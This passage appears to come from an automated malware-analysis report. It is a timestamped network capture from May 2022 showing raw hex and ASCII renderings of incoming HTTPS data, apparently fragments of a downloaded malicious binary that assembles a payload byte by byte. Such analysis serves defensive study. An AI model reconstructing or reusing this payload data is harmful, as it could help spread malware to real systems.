85 8c Data Ascii: hVijklmnopqfrstuvwxyzz5{\|i}~VeDR.~7M$
2022-05-16 08:29:53 UTC	1645	IN	Data Raw: f6 ff 20 c6 85 8d 9c f6 ff 02 c6 85 8e 9c f6 ff cd c6 85 8f 9c f6 ff e8 c6 85 90 9c f6 ff f8 c6 85 91 9c f6 ff 56 c6 85 92 9c f6 ff d2 c6 85 93 9c f6 ff 56 c6 85 94 9c f6 ff 12 c6 85 95 9c f6 ff 30 c6 85 96 9c f6 ff 62 c6 85 97 9c f6 ff 91 c6 85 98 9c f6 ff a3 c6 85 99 9c f6 ff cd c6 85 9a 9c f6 ff 8d c6 85 9b 9c f6 ff 5a c6 85 9c 9c f6 ff 00 c6 85 9d 9c f6 ff 9c c6 85 9e 9c f6 ff a1 c6 85 9f 9c f6 ff 39 c6 85 a0 9c f6 ff b0 c6 85 a1 9c f6 ff 92 c6 85 a2 9c f6 ff a7 c6 85 a3 9c f6 ff 7a c6 85 a4 9c f6 ff bd c6 85 a5 9c f6 ff 13 c6 85 a6 9c f6 ff 96 c6 85 a7 9c f6 ff f8 c6 85 a8 9c f6 ff 84 c6 85 a9 9c f6 ff 56 c6 85 aa 9c f6 ff 65 c6 85 ab 9c f6 ff c6 c6 85 ac 9c f6 ff 34 c6 85 ad 9c f6 ff 44 c6 85 ae 9c f6 ff 77 c6 85 af 9c f6 ff cf c6 85 b0 9c f6 ff bf Data Ascii: VV0bZ9zVe4Dw
2022-05-16 08:29:53 UTC	1661	IN	Data Raw: 85 b1 a5 f6 ff 0f c6 85 b2 a5 f6 ff be c6 85 b3 a5 f6 ff 1d c6 85 b4 a5 f6 ff e3 c6 85 b5 a5 f6 ff f9 c6 85 b6 a5 f6 ff 66 c6 85 b7 a5 f6 ff 7f c6 85 b8 a5 f6 ff cd c6 85 b9 a5 f6 ff b0 c6 85 ba a5 f6 ff 6d c6 85 bb a5 f6 ff 4b c6 85 bc a5 f6 ff be c6 85 bd a5 f6 ff f6 c6 85 be a5 f6 ff b9 c6 85 bf a5 f6 ff cf c6 85 c0 a5 f6 ff 1e c6 85 c1 a5 f6 ff 30 c6 85 c2 a5 f6 ff 37 c6 85 c3 a5 f6 ff 33 c6 85 c4 a5 f6 ff 47 c6 85 c5 a5 f6 ff 65 c6 85 c6 a5 f6 ff 8c c6 85 c7 a5 f6 ff 18 c6 85 c8 a5 f6 ff 6a c6 85 c9 a5 f6 ff 45 c6 85 ca a5 f6 ff fc c6 85 cb a5 f6 ff a1 c6 85 cc a5 f6 ff 3d c6 85 cd a5 f6 ff 1b c6 85 ce a5 f6 ff ad c6 85 cf a5 f6 ff 6a c6 85 d0 a5 f6 ff 2c c6 85 d1 a5 f6 ff 0f c6 85 d2 a5 f6 ff 8e c6 85 d3 a5 f6 ff da c6 85 d4 a5 f6 ff 6d c6 85 d5 a5 Data Ascii: fmK073GejE=j,m
2022-05-16 08:29:53 UTC	1677	IN	Data Raw: ff f2 c6 85 d6 ae f6 ff d2 c6 85 d7 ae f6 ff e8 c6 85 d8 ae f6 ff 0b c6 85 d9 ae f6 ff d3 c6 85 da ae f6 ff 38 c6 85 db ae f6 ff be c6 85 dc ae f6 ff 89 c6 85 dd ae f6 ff af c6 85 de ae f6 ff 47 c6 85 df ae f6 ff cf c6 85 e0 ae f6 ff 2e c6 85 e1 ae f6 ff 81 c6 85 e2 ae f6 ff 4c c6 85 e3 ae f6 ff 3b c6 85 e4 ae f6 ff c3 c6 85 e5 ae f6 ff 5b c6 85 e6 ae f6 ff d3 c6 85 e7 ae f6 ff 96 c6 85 e8 ae f6 ff 23 c6 85 e9 ae f6 ff 3b c6 85 ea ae f6 ff da c6 85 eb ae f6 ff 37 c6 85 ec ae f6 ff f0 c6 85 ed ae f6 ff ca c6 85 ee ae f6 ff 88 c6 85 ef ae f6 ff b0 c6 85 f0 ae f6 ff 78 c6 85 f1 ae f6 ff f5 c6 85 f2 ae f6 ff e1 c6 85 f3 ae f6 ff 74 c6 85 f4 ae f6 ff de c6 85 f5 ae f6 ff 19 c6 85 f6 ae f6 ff 82 c6 85 f7 ae f6 ff 96 c6 85 f8 ae f6 ff 4e c6 85 f9 ae f6 ff d2 c6 Data Ascii: 8G.L;[#;7xtN
2022-05-16 08:29:53 UTC	1693	IN	Data Raw: fa b7 f6 ff 81 c6 85 fb b7 f6 ff 71 c6 85 fc b7 f6 ff a2 c6 85 fd b7 f6 ff 30 c6 85 fe b7 f6 ff 56 c6 85 ff b7 f6 ff 26 c6 85 00 b8 f6 ff 71 c6 85 01 b8 f6 ff 1e c6 85 02 b8 f6 ff 77 c6 85 03 b8 f6 ff 61 c6 85 04 b8 f6 ff 28 c6 85 05 b8 f6 ff dd c6 85 06 b8 f6 ff 31 c6 85 07 b8 f6 ff 7a c6 85 08 b8 f6 ff f5 c6 85 09 b8 f6 ff 20 c6 85 0a b8 f6 ff d1 c6 85 0b b8 f6 ff e3 c6 85 0c b8 f6 ff 33 c6 85 0d b8 f6 ff f5 c6 85 0e b8 f6 ff 17 c6 85 0f b8 f6 ff 70 c6 85 10 b8 f6 ff 96 c6 85 11 b8 f6 ff d5 c6 85 12 b8 f6 ff 2b c6 85 13 b8 f6 ff c4 c6 85 14 b8 f6 ff cc c6 85 15 b8 f6 ff 66 c6 85 16 b8 f6 ff 60 c6 85 17 b8 f6 ff 78 c6 85 18 b8 f6 ff 93 c6 85 19 b8 f6 ff f8 c6 85 1a b8 f6 ff 34 c6 85 1b b8 f6 ff 34 c6 85 1c b8 f6 ff 64 c6 85 1d b8 f6 ff f6 c6 85 1e b8 f6 Data Ascii: q0V&qwa(1z 3p+f`x44d
2022-05-16 08:29:53 UTC	1709	IN	Data Raw: eb c6 85 1f c1 f6 ff e5 c6 85 20 c1 f6 ff e0 c6 85 21 c1 f6 ff 09 c6 85 22 c1 f6 ff 8e c6 85 23 c1 f6 ff cc c6 85 24 c1 f6 ff 71 c6 85 25 c1 f6 ff f3 c6 85 26 c1 f6 ff f5 c6 85 27 c1 f6 ff db c6 85 28 c1 f6 ff 4f c6 85 29 c1 f6 ff 2c c6 85 2a c1 f6 ff fe c6 85 2b c1 f6 ff e5 c6 85 2c c1 f6 ff 7f c6 85 2d c1 f6 ff a2 c6 85 2e c1 f6 ff b9 c6 85 2f c1 f6 ff 50 c6 85 30 c1 f6 ff 26 c6 85 31 c1 f6 ff 05 c6 85 32 c1 f6 ff b0 c6 85 33 c1 f6 ff 30 c6 85 34 c1 f6 ff b5 c6 85 35 c1 f6 ff f4 c6 85 36 c1 f6 ff b8 c6 85 37 c1 f6 ff 7f c6 85 38 c1 f6 ff 41 c6 85 39 c1 f6 ff 5b c6 85 3a c1 f6 ff 56 c6 85 3b c1 f6 ff 46 c6 85 3c c1 f6 ff 56 c6 85 3d c1 f6 ff 30 c6 85 3e c1 f6 ff 0a c6 85 3f c1 f6 ff 8c c6 85 40 c1 f6 ff c6 c6 85 41 c1 f6 ff 78 c6 85 42 c1 f6 ff e7 c6 85 Data Ascii: !"#$q%&'(O),*+,-./P0&123045678A9[:V;F<V=0>?@AxB
2022-05-16 08:29:53 UTC	1725	IN	Data Raw: ca f6 ff 14 c6 85 44 ca f6 ff 79 c6 85 45 ca f6 ff d4 c6 85 46 ca f6 ff 0a c6 85 47 ca f6 ff 11 c6 85 48 ca f6 ff 5d c6 85 49 ca f6 ff c3 c6 85 4a ca f6 ff 1f c6 85 4b ca f6 ff 14 c6 85 4c ca f6 ff ef c6 85 4d ca f6 ff c2 c6 85 4e ca f6 ff 51 c6 85 4f ca f6 ff bc c6 85 50 ca f6 ff 0b c6 85 51 ca f6 ff 5a c6 85 52 ca f6 ff 40 c6 85 53 ca f6 ff fb c6 85 54 ca f6 ff 31 c6 85 55 ca f6 ff d1 c6 85 56 ca f6 ff 1c c6 85 57 ca f6 ff c9 c6 85 58 ca f6 ff 07 c6 85 59 ca f6 ff a9 c6 85 5a ca f6 ff 1e c6 85 5b ca f6 ff c8 c6 85 5c ca f6 ff 7e c6 85 5d ca f6 ff db c6 85 5e ca f6 ff aa c6 85 5f ca f6 ff a7 c6 85 60 ca f6 ff ee c6 85 61 ca f6 ff ea c6 85 62 ca f6 ff 56 c6 85 63 ca f6 ff bc c6 85 64 ca f6 ff 23 c6 85 65 ca f6 ff 5e c6 85 66 ca f6 ff be c6 85 67 ca f6 ff Data Ascii: DyEFGH]IJKLMNQOPQZR@ST1UVWXYZ[\~]^_`abVcd#e^fg
2022-05-16 08:29:53 UTC	1741	IN	Data Raw: c6 85 68 d3 f6 ff 7f c6 85 69 d3 f6 ff cf c6 85 6a d3 f6 ff f8 c6 85 6b d3 f6 ff ad c6 85 6c d3 f6 ff 6a c6 85 6d d3 f6 ff 45 c6 85 6e d3 f6 ff 28 c6 85 6f d3 f6 ff 19 c6 85 70 d3 f6 ff 23 c6 85 71 d3 f6 ff b9 c6 85 72 d3 f6 ff 67 c6 85 73 d3 f6 ff 68 c6 85 74 d3 f6 ff 3c c6 85 75 d3 f6 ff e3 c6 85 76 d3 f6 ff 84 c6 85 77 d3 f6 ff 52 c6 85 78 d3 f6 ff 6a c6 85 79 d3 f6 ff 82 c6 85 7a d3 f6 ff 1c c6 85 7b d3 f6 ff 32 c6 85 7c d3 f6 ff 6f c6 85 7d d3 f6 ff f0 c6 85 7e d3 f6 ff 64 c6 85 7f d3 f6 ff fa c6 85 80 d3 f6 ff 3d c6 85 81 d3 f6 ff 52 c6 85 82 d3 f6 ff e1 c6 85 83 d3 f6 ff 75 c6 85 84 d3 f6 ff 29 c6 85 85 d3 f6 ff ca c6 85 86 d3 f6 ff f5 c6 85 87 d3 f6 ff d8 c6 85 88 d3 f6 ff d1 c6 85 89 d3 f6 ff ec c6 85 8a d3 f6 ff 33 c6 85 8b d3 f6 ff 49 c6 85 8c Data Ascii: hijkljmEn(op#qrgsht<uvwRxjyz{2\|o}~d=Ru)3I
2022-05-16 08:29:53 UTC	1757	IN	Data Raw: f6 ff ee c6 85 8d dc f6 ff cf c6 85 8e dc f6 ff 1e c6 85 8f dc f6 ff 30 c6 85 90 dc f6 ff 37 c6 85 91 dc f6 ff 33 c6 85 92 dc f6 ff 7e c6 85 93 dc f6 ff bb c6 85 94 dc f6 ff 4a c6 85 95 dc f6 ff 04 c6 85 96 dc f6 ff 85 c6 85 97 dc f6 ff 89 c6 85 98 dc f6 ff f9 c6 85 99 dc f6 ff 92 c6 85 9a dc f6 ff f4 c6 85 9b dc f6 ff 92 c6 85 9c dc f6 ff a5 c6 85 9d dc f6 ff b8 c6 85 9e dc f6 ff 36 c6 85 9f dc f6 ff 59 c6 85 a0 dc f6 ff 5c c6 85 a1 dc f6 ff 5b c6 85 a2 dc f6 ff aa c6 85 a3 dc f6 ff ab c6 85 a4 dc f6 ff 4f c6 85 a5 dc f6 ff 19 c6 85 a6 dc f6 ff a9 c6 85 a7 dc f6 ff 5a c6 85 a8 dc f6 ff 74 c6 85 a9 dc f6 ff 61 c6 85 aa dc f6 ff c9 c6 85 ab dc f6 ff dd c6 85 ac dc f6 ff 47 c6 85 ad dc f6 ff 1a c6 85 ae dc f6 ff e1 c6 85 af dc f6 ff 43 c6 85 b0 dc f6 ff cd Data Ascii: 073~J6Y\[OZtaGC
2022-05-16 08:29:53 UTC	1773	IN	Data Raw: 85 b1 e5 f6 ff e8 c6 85 b2 e5 f6 ff ef c6 85 b3 e5 f6 ff 14 c6 85 b4 e5 f6 ff e3 c6 85 b5 e5 f6 ff a9 c6 85 b6 e5 f6 ff a9 c6 85 b7 e5 f6 ff 69 c6 85 b8 e5 f6 ff 6a c6 85 b9 e5 f6 ff 2f c6 85 ba e5 f6 ff d0 c6 85 bb e5 f6 ff 83 c6 85 bc e5 f6 ff bd c6 85 bd e5 f6 ff 1c c6 85 be e5 f6 ff 65 c6 85 bf e5 f6 ff b8 c6 85 c0 e5 f6 ff e1 c6 85 c1 e5 f6 ff 74 c6 85 c2 e5 f6 ff f3 c6 85 c3 e5 f6 ff c2 c6 85 c4 e5 f6 ff 1c c6 85 c5 e5 f6 ff d7 c6 85 c6 e5 f6 ff 10 c6 85 c7 e5 f6 ff 1e c6 85 c8 e5 f6 ff 96 c6 85 c9 e5 f6 ff 5e c6 85 ca e5 f6 ff 8c c6 85 cb e5 f6 ff d4 c6 85 cc e5 f6 ff 51 c6 85 cd e5 f6 ff 78 c6 85 ce e5 f6 ff f1 c6 85 cf e5 f6 ff 70 c6 85 d0 e5 f6 ff 34 c6 85 d1 e5 f6 ff e9 c6 85 d2 e5 f6 ff b8 c6 85 d3 e5 f6 ff 95 c6 85 d4 e5 f6 ff f3 c6 85 d5 e5 Data Ascii: ij/et^Qxp4
2022-05-16 08:29:53 UTC	1789	IN	Data Raw: ff eb c6 85 d6 ee f6 ff ba c6 85 d7 ee f6 ff 44 c6 85 d8 ee f6 ff a7 c6 85 d9 ee f6 ff ff c6 85 da ee f6 ff 77 c6 85 db ee f6 ff b3 c6 85 dc ee f6 ff cd c6 85 dd ee f6 ff c8 c6 85 de ee f6 ff 97 c6 85 df ee f6 ff 09 c6 85 e0 ee f6 ff bd c6 85 e1 ee f6 ff 0c c6 85 e2 ee f6 ff 87 c6 85 e3 ee f6 ff e2 c6 85 e4 ee f6 ff b9 c6 85 e5 ee f6 ff 44 c6 85 e6 ee f6 ff 8b c6 85 e7 ee f6 ff f0 c6 85 e8 ee f6 ff f1 c6 85 e9 ee f6 ff 35 c6 85 ea ee f6 ff de c6 85 eb ee f6 ff 74 c6 85 ec ee f6 ff c5 c6 85 ed ee f6 ff 9d c6 85 ee ee f6 ff 43 c6 85 ef ee f6 ff 53 c6 85 f0 ee f6 ff 86 c6 85 f1 ee f6 ff 27 c6 85 f2 ee f6 ff a8 c6 85 f3 ee f6 ff e7 c6 85 f4 ee f6 ff 03 c6 85 f5 ee f6 ff 64 c6 85 f6 ee f6 ff a8 c6 85 f7 ee f6 ff 47 c6 85 f8 ee f6 ff 80 c6 85 f9 ee f6 ff 33 c6 Data Ascii: DwD5tCS'dG3
2022-05-16 08:29:53 UTC	1805	IN	Data Raw: fa f7 f6 ff 70 c6 85 fb f7 f6 ff 3f c6 85 fc f7 f6 ff 30 c6 85 fd f7 f6 ff 56 c6 85 fe f7 f6 ff e1 c6 85 ff f7 f6 ff c0 c6 85 00 f8 f6 ff c5 c6 85 01 f8 f6 ff 90 c6 85 02 f8 f6 ff a4 c6 85 03 f8 f6 ff fb c6 85 04 f8 f6 ff 3a c6 85 05 f8 f6 ff 21 c6 85 06 f8 f6 ff 07 c6 85 07 f8 f6 ff 43 c6 85 08 f8 f6 ff 56 c6 85 09 f8 f6 ff a9 c6 85 0a f8 f6 ff 13 c6 85 0b f8 f6 ff 80 c6 85 0c f8 f6 ff a7 c6 85 0d f8 f6 ff e0 c6 85 0e f8 f6 ff 81 c6 85 0f f8 f6 ff 14 c6 85 10 f8 f6 ff 83 c6 85 11 f8 f6 ff 4d c6 85 12 f8 f6 ff a3 c6 85 13 f8 f6 ff fb c6 85 14 f8 f6 ff 62 c6 85 15 f8 f6 ff 89 c6 85 16 f8 f6 ff f4 c6 85 17 f8 f6 ff 92 c6 85 18 f8 f6 ff f4 c6 85 19 f8 f6 ff 19 c6 85 1a f8 f6 ff e8 c6 85 1b f8 f6 ff 65 c6 85 1c f8 f6 ff 80 c6 85 1d f8 f6 ff 7b c6 85 1e f8 f6 Data Ascii: p?0V:!CVMbe{
2022-05-16 08:29:53 UTC	1821	IN	Data Raw: 80 c6 85 1f 01 f7 ff 39 c6 85 20 01 f7 ff a1 c6 85 21 01 f7 ff e0 c6 85 22 01 f7 ff ac c6 85 23 01 f7 ff 9e c6 85 24 01 f7 ff 0a c6 85 25 01 f7 ff 5a c6 85 26 01 f7 ff cf c6 85 27 01 f7 ff 23 c6 85 28 01 f7 ff 34 c6 85 29 01 f7 ff 70 c6 85 2a 01 f7 ff 78 c6 85 2b 01 f7 ff b9 c6 85 2c 01 f7 ff e0 c6 85 2d 01 f7 ff 14 c6 85 2e 01 f7 ff 31 c6 85 2f 01 f7 ff fd c6 85 30 01 f7 ff e3 c6 85 31 01 f7 ff ca c6 85 32 01 f7 ff 13 c6 85 33 01 f7 ff aa c6 85 34 01 f7 ff a9 c6 85 35 01 f7 ff 45 c6 85 36 01 f7 ff fd c6 85 37 01 f7 ff 96 c6 85 38 01 f7 ff 81 c6 85 39 01 f7 ff ac c6 85 3a 01 f7 ff 47 c6 85 3b 01 f7 ff 45 c6 85 3c 01 f7 ff 17 c6 85 3d 01 f7 ff 0b c6 85 3e 01 f7 ff 94 c6 85 3f 01 f7 ff 0c c6 85 40 01 f7 ff 0b c6 85 41 01 f7 ff e7 c6 85 42 01 f7 ff fc c6 85 Data Ascii: 9 !"#$%Z&'#(4)p*x+,-.1/012345E6789:G;E<=>?@AB
2022-05-16 08:29:53 UTC	1837	IN	Data Raw: 0a f7 ff f9 c6 85 44 0a f7 ff f8 c6 85 45 0a f7 ff a1 c6 85 46 0a f7 ff 81 c6 85 47 0a f7 ff 9c c6 85 48 0a f7 ff 2d c6 85 49 0a f7 ff cf c6 85 4a 0a f7 ff a9 c6 85 4b 0a f7 ff fc c6 85 4c 0a f7 ff 51 c6 85 4d 0a f7 ff f4 c6 85 4e 0a f7 ff 0a c6 85 4f 0a f7 ff 5a c6 85 50 0a f7 ff cf c6 85 51 0a f7 ff dd c6 85 52 0a f7 ff ea c6 85 53 0a f7 ff c8 c6 85 54 0a f7 ff 79 c6 85 55 0a f7 ff f1 c6 85 56 0a f7 ff 5d c6 85 57 0a f7 ff f2 c6 85 58 0a f7 ff 3b c6 85 59 0a f7 ff 59 c6 85 5a 0a f7 ff 38 c6 85 5b 0a f7 ff 28 c6 85 5c 0a f7 ff 9f c6 85 5d 0a f7 ff 6e c6 85 5e 0a f7 ff dd c6 85 5f 0a f7 ff 34 c6 85 60 0a f7 ff 64 c6 85 61 0a f7 ff 09 c6 85 62 0a f7 ff 81 c6 85 63 0a f7 ff f4 c6 85 64 0a f7 ff b8 c6 85 65 0a f7 ff b9 c6 85 66 0a f7 ff 53 c6 85 67 0a f7 ff Data Ascii: DEFGH-IJKLQMNOZPQRSTyUV]WX;YYZ8[(\]n^_4`dabcdefSg
2022-05-16 08:29:53 UTC	1853	IN	Data Raw: c6 85 68 13 f7 ff 0b c6 85 69 13 f7 ff 6d c6 85 6a 13 f7 ff 2e c6 85 6b 13 f7 ff 74 c6 85 6c 13 f7 ff c5 c6 85 6d 13 f7 ff ff c6 85 6e 13 f7 ff f8 c6 85 6f 13 f7 ff 6d c6 85 70 13 f7 ff 4a c6 85 71 13 f7 ff d6 c6 85 72 13 f7 ff 78 c6 85 73 13 f7 ff c8 c6 85 74 13 f7 ff a9 c6 85 75 13 f7 ff 5a c6 85 76 13 f7 ff 6b c6 85 77 13 f7 ff 09 c6 85 78 13 f7 ff 7f c6 85 79 13 f7 ff 28 c6 85 7a 13 f7 ff 80 c6 85 7b 13 f7 ff ae c6 85 7c 13 f7 ff 1e c6 85 7d 13 f7 ff bc c6 85 7e 13 f7 ff 6b c6 85 7f 13 f7 ff d2 c6 85 80 13 f7 ff 2e c6 85 81 13 f7 ff 79 c6 85 82 13 f7 ff 00 c6 85 83 13 f7 ff 40 c6 85 84 13 f7 ff f8 c6 85 85 13 f7 ff bc c6 85 86 13 f7 ff 5d c6 85 87 13 f7 ff 94 c6 85 88 13 f7 ff df c6 85 89 13 f7 ff b4 c6 85 8a 13 f7 ff 6c c6 85 8b 13 f7 ff 59 c6 85 8c Data Ascii: himj.ktlmnompJqrxstuZvkwxy(z{\|}~k.y@]lY
2022-05-16 08:29:53 UTC	1869	IN	Data Raw: f7 ff c6 c6 85 8d 1c f7 ff 14 c6 85 8e 1c f7 ff e3 c6 85 8f 1c f7 ff 50 c6 85 90 1c f7 ff 79 c6 85 91 1c f7 ff 17 c6 85 92 1c f7 ff 64 c6 85 93 1c f7 ff 68 c6 85 94 1c f7 ff 5a c6 85 95 1c f7 ff 1e c6 85 96 1c f7 ff e0 c6 85 97 1c f7 ff ba c6 85 98 1c f7 ff 2b c6 85 99 1c f7 ff 6c c6 85 9a 1c f7 ff 96 c6 85 9b 1c f7 ff bc c6 85 9c 1c f7 ff a4 c6 85 9d 1c f7 ff bd c6 85 9e 1c f7 ff d3 c6 85 9f 1c f7 ff 95 c6 85 a0 1c f7 ff 46 c6 85 a1 1c f7 ff 1e c6 85 a2 1c f7 ff 0b c6 85 a3 1c f7 ff f3 c6 85 a4 1c f7 ff 60 c6 85 a5 1c f7 ff be c6 85 a6 1c f7 ff 24 c6 85 a7 1c f7 ff 5f c6 85 a8 1c f7 ff 47 c6 85 a9 1c f7 ff cf c6 85 aa 1c f7 ff 2e c6 85 ab 1c f7 ff 71 c6 85 ac 1c f7 ff 0c c6 85 ad 1c f7 ff 40 c6 85 ae 1c f7 ff f8 c6 85 af 1c f7 ff bc c6 85 b0 1c f7 ff d5 Data Ascii: PydhZ+lF`$_G.q@
2022-05-16 08:29:53 UTC	1885	IN	Data Raw: 85 b1 25 f7 ff 67 c6 85 b2 25 f7 ff f4 c6 85 b3 25 f7 ff b8 c6 85 b4 25 f7 ff 9b c6 85 b5 25 f7 ff f2 c6 85 b6 25 f7 ff 84 c6 85 b7 25 f7 ff 30 c6 85 b8 25 f7 ff f1 c6 85 b9 25 f7 ff 83 c6 85 ba 25 f7 ff 0c c6 85 bb 25 f7 ff 6d c6 85 bc 25 f7 ff 81 c6 85 bd 25 f7 ff 3d c6 85 be 25 f7 ff 2e c6 85 bf 25 f7 ff a4 c6 85 c0 25 f7 ff 65 c6 85 c1 25 f7 ff 6d c6 85 c2 25 f7 ff 17 c6 85 c3 25 f7 ff cb c6 85 c4 25 f7 ff ea c6 85 c5 25 f7 ff 83 c6 85 c6 25 f7 ff f8 c6 85 c7 25 f7 ff c0 c6 85 c8 25 f7 ff 5f c6 85 c9 25 f7 ff ad c6 85 ca 25 f7 ff 08 c6 85 cb 25 f7 ff e0 c6 85 cc 25 f7 ff 1f c6 85 cd 25 f7 ff b3 c6 85 ce 25 f7 ff 5a c6 85 cf 25 f7 ff 57 c6 85 d0 25 f7 ff 6c c6 85 d1 25 f7 ff 06 c6 85 d2 25 f7 ff b0 c6 85 d3 25 f7 ff 60 c6 85 d4 25 f7 ff f7 c6 85 d5 25 Data Ascii: %g%%%%%%0%%%%m%%=%.%%e%m%%%%%%%_%%%%%%Z%W%l%%%`%%
2022-05-16 08:29:53 UTC	1901	IN	Data Raw: ff f2 c6 85 d6 2e f7 ff 33 c6 85 d7 2e f7 ff a9 c6 85 d8 2e f7 ff a9 c6 85 d9 2e f7 ff bb c6 85 da 2e f7 ff 39 c6 85 db 2e f7 ff 30 c6 85 dc 2e f7 ff 71 c6 85 dd 2e f7 ff 63 c6 85 de 2e f7 ff cc c6 85 df 2e f7 ff 39 c6 85 e0 2e f7 ff c0 c6 85 e1 2e f7 ff f7 c6 85 e2 2e f7 ff 3c c6 85 e3 2e f7 ff dd c6 85 e4 2e f7 ff f4 c6 85 e5 2e f7 ff 92 c6 85 e6 2e f7 ff 77 c6 85 e7 2e f7 ff 51 c6 85 e8 2e f7 ff ad c6 85 e9 2e f7 ff 6a c6 85 ea 2e f7 ff 3c c6 85 eb 2e f7 ff ff c6 85 ec 2e f7 ff ec c6 85 ed 2e f7 ff 90 c6 85 ee 2e f7 ff 5a c6 85 ef 2e f7 ff 98 c6 85 f0 2e f7 ff 71 c6 85 f1 2e f7 ff eb c6 85 f2 2e f7 ff 59 c6 85 f3 2e f7 ff 21 c6 85 f4 2e f7 ff b8 c6 85 f5 2e f7 ff e0 c6 85 f6 2e f7 ff f4 c6 85 f7 2e f7 ff a5 c6 85 f8 2e f7 ff 62 c6 85 f9 2e f7 ff 05 c6 Data Ascii: .3....9.0.q.c..9...<....w.Q..j.<....Z..q..Y.!.....b.
2022-05-16 08:29:53 UTC	1917	IN	Data Raw: fa 37 f7 ff d0 c6 85 fb 37 f7 ff b8 c6 85 fc 37 f7 ff b8 c6 85 fd 37 f7 ff 30 c6 85 fe 37 f7 ff 43 c6 85 ff 37 f7 ff 4c c6 85 00 38 f7 ff 7d c6 85 01 38 f7 ff d5 c6 85 02 38 f7 ff ac c6 85 03 38 f7 ff 33 c6 85 04 38 f7 ff 94 c6 85 05 38 f7 ff 78 c6 85 06 38 f7 ff 7f c6 85 07 38 f7 ff fd c6 85 08 38 f7 ff 44 c6 85 09 38 f7 ff bb c6 85 0a 38 f7 ff 0b c6 85 0b 38 f7 ff 71 c6 85 0c 38 f7 ff 81 c6 85 0d 38 f7 ff 75 c6 85 0e 38 f7 ff b8 c6 85 0f 38 f7 ff 92 c6 85 10 38 f7 ff 7e c6 85 11 38 f7 ff 94 c6 85 12 38 f7 ff e3 c6 85 13 38 f7 ff 69 c6 85 14 38 f7 ff 2d c6 85 15 38 f7 ff 08 c6 85 16 38 f7 ff 2b c6 85 17 38 f7 ff b9 c6 85 18 38 f7 ff 9b c6 85 19 38 f7 ff a8 c6 85 1a 38 f7 ff e0 c6 85 1b 38 f7 ff c7 c6 85 1c 38 f7 ff 8c c6 85 1d 38 f7 ff 2e c6 85 1e 38 f7 Data Ascii: 777707C7L8}888388x888D888q88u888~888i8-88+8888888.8
2022-05-16 08:29:53 UTC	1933	IN	Data Raw: cf c6 85 1f 41 f7 ff 0f c6 85 20 41 f7 ff 64 c6 85 21 41 f7 ff 83 c6 85 22 41 f7 ff cd c6 85 23 41 f7 ff 39 c6 85 24 41 f7 ff 4d c6 85 25 41 f7 ff ee c6 85 26 41 f7 ff 15 c6 85 27 41 f7 ff 47 c6 85 28 41 f7 ff f8 c6 85 29 41 f7 ff 70 c6 85 2a 41 f7 ff 96 c6 85 2b 41 f7 ff 9f c6 85 2c 41 f7 ff 95 c6 85 2d 41 f7 ff 03 c6 85 2e 41 f7 ff 21 c6 85 2f 41 f7 ff 29 c6 85 30 41 f7 ff 3d c6 85 31 41 f7 ff 7b c6 85 32 41 f7 ff 74 c6 85 33 41 f7 ff fc c6 85 34 41 f7 ff cb c6 85 35 41 f7 ff 38 c6 85 36 41 f7 ff 2d c6 85 37 41 f7 ff cc c6 85 38 41 f7 ff 77 c6 85 39 41 f7 ff af c6 85 3a 41 f7 ff 34 c6 85 3b 41 f7 ff e5 c6 85 3c 41 f7 ff e9 c6 85 3d 41 f7 ff e1 c6 85 3e 41 f7 ff 69 c6 85 3f 41 f7 ff 73 c6 85 40 41 f7 ff 35 c6 85 41 41 f7 ff 11 c6 85 42 41 f7 ff 85 c6 85 Data Ascii: A Ad!A"A#A9$AM%A&A'AG(A)Ap*A+A,A-A.A!/A)0A=1A{2At3A4A5A86A-7A8Aw9A:A4;A<A=A>Ai?As@A5AABA
2022-05-16 08:29:53 UTC	1949	IN	Data Raw: 4a f7 ff ff c6 85 44 4a f7 ff e0 c6 85 45 4a f7 ff 1e c6 85 46 4a f7 ff d7 c6 85 47 4a f7 ff 4d c6 85 48 4a f7 ff 3f c6 85 49 4a f7 ff 57 c6 85 4a 4a f7 ff e1 c6 85 4b 4a f7 ff 43 c6 85 4c 4a f7 ff 61 c6 85 4d 4a f7 ff f9 c6 85 4e 4a f7 ff 28 c6 85 4f 4a f7 ff 50 c6 85 50 4a f7 ff 9c c6 85 51 4a f7 ff b8 c6 85 52 4a f7 ff 07 c6 85 53 4a f7 ff 43 c6 85 54 4a f7 ff 56 c6 85 55 4a f7 ff db c6 85 56 4a f7 ff 1f c6 85 57 4a f7 ff 30 c6 85 58 4a f7 ff 3c c6 85 59 4a f7 ff b1 c6 85 5a 4a f7 ff 79 c6 85 5b 4a f7 ff 1c c6 85 5c 4a f7 ff 9c c6 85 5d 4a f7 ff 30 c6 85 5e 4a f7 ff 07 c6 85 5f 4a f7 ff f4 c6 85 60 4a f7 ff e1 c6 85 61 4a f7 ff 8d c6 85 62 4a f7 ff 50 c6 85 63 4a f7 ff b6 c6 85 64 4a f7 ff f4 c6 85 65 4a f7 ff 92 c6 85 66 4a f7 ff a5 c6 85 67 4a f7 ff Data Ascii: JDJEJFJGJMHJ?IJWJJKJCLJaMJNJ(OJPPJQJRJSJCTJVUJVJWJ0XJ<YJZJy[J\J]J0^J_J`JaJbJPcJdJeJfJgJ
2022-05-16 08:29:53 UTC	1965	IN	Data Raw: c6 85 68 53 f7 ff 69 c6 85 69 53 f7 ff c8 c6 85 6a 53 f7 ff 87 c6 85 6b 53 f7 ff 10 c6 85 6c 53 f7 ff d5 c6 85 6d 53 f7 ff 61 c6 85 6e 53 f7 ff a4 c6 85 6f 53 f7 ff 1e c6 85 70 53 f7 ff 87 c6 85 71 53 f7 ff ad c6 85 72 53 f7 ff d8 c6 85 73 53 f7 ff 08 c6 85 74 53 f7 ff 1e c6 85 75 53 f7 ff bc c6 85 76 53 f7 ff 47 c6 85 77 53 f7 ff 69 c6 85 78 53 f7 ff 2e c6 85 79 53 f7 ff 0c c6 85 7a 53 f7 ff 50 c6 85 7b 53 f7 ff c4 c6 85 7c 53 f7 ff 2b c6 85 7d 53 f7 ff bc c6 85 7e 53 f7 ff a9 c6 85 7f 53 f7 ff d2 c6 85 80 53 f7 ff 96 c6 85 81 53 f7 ff 44 c6 85 82 53 f7 ff c8 c6 85 83 53 f7 ff ec c6 85 84 53 f7 ff 0b c6 85 85 53 f7 ff cc c6 85 86 53 f7 ff 9d c6 85 87 53 f7 ff ed c6 85 88 53 f7 ff 44 c6 85 89 53 f7 ff ec c6 85 8a 53 f7 ff b7 c6 85 8b 53 f7 ff 83 c6 85 8c Data Ascii: hSiiSjSkSlSmSanSoSpSqSrSsStSuSvSGwSixS.ySzSP{S\|S+}S~SSSSDSSSSSSSDSSS
